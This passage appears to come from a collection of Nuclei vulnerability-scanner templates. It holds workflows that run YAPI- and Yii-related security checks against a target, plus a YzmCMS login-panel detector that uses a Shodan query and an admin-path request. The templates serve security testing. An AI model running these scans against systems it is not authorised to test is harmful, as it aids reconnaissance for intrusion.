7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: yapi 12 | subtemplates: 13 | - tags: yapi -------------------------------------------------------------------------------- /yii-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: yii-workflow 2 | 3 | info: 4 | name: Yii Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Yii related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: yii 12 | subtemplates: 13 | - tags: yii -------------------------------------------------------------------------------- /yzmcms-panel.yaml: -------------------------------------------------------------------------------- 1 | id: yzmcms-panel 2 | 3 | info: 4 | name: YzmCMS Login Panel 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"YzmCMS" 9 | tags: panel,yzmcms,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/admin/index/login.html' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - 'Powered By